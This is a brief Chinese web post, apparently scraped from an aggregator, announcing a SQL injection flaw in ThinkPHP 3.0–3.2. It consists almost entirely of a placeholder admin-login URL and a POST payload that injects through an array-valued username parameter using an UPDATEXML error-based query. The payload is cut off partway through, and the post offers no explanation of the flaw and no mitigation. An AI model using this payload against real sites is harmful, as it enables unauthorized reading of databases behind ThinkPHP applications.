ThinkPHP 3.0~3.2 注入漏洞

地址:http://xx.com/index.php/Admin.php?s=/User/Public/checkphp payload:act=verify&username[0]=='1')) AND UPDATEXML(6026,CONCAT(0x2e0x7167656371,(SELECT (CASE WHEN (6026=6026) THEN 1 ELSE 0 END)),0x716e7
相關文章
相關標籤/搜索